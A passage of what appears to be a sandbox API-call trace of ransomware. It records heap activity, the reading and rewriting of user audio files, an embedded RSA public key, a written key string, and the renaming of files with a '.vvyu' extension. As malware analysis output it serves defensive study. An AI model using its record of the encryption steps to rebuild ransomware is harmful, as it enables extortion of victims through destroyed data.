lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1f48 | out: hHeap=0x620000) returned 1 [0203.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.330] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x180e0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x180e0, lpOverlapped=0x0) returned 1 [0203.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.331] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x180e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.331] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.333] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.333] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.333] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.333] CloseHandle (hObject=0x510) returned 1 [0203.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0203.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.336] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\GWrBK8mbOy.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\gwrbk8mboy.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\GWrBK8mbOy.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\gwrbk8mboy.wav.vvyu")) returned 1 [0203.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.338] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.340] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10822300, ftCreationTime.dwHighDateTime=0x1d89c15, ftLastAccessTime.dwLowDateTime=0x49f94ba0, ftLastAccessTime.dwHighDateTime=0x1d8a416, ftLastWriteTime.dwLowDateTime=0x49f94ba0, ftLastWriteTime.dwHighDateTime=0x1d8a416, nFileSizeHigh=0x0, nFileSizeLow=0x4793, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HbqLBzpGm.wav", cAlternateFileName="HBQLBZ~1.WAV")) returned 1 [0203.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.340] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\HbqLBzpGm.wav") returned=".wav" [0203.340] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\HbqLBzpGm.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\hbqlbzpgm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.341] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=18323) returned 1 [0203.341] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.344] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x476d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.344] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.346] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.346] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4793, lpOverlapped=0x0) returned 1 [0203.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.347] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.348] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.348] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.348] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.348] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.349] GetLastError () returned 0x0 [0203.349] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.349] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.349] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.349] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.349] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4790) returned 0x2ea99b0 [0203.350] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f48 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f90 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.351] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea37b8 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0203.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.355] GetCurrentThreadId () returned 0x66c [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3cc0 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.355] GetCurrentThreadId () returned 0x66c [0203.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.358] RtlAllocateHeap 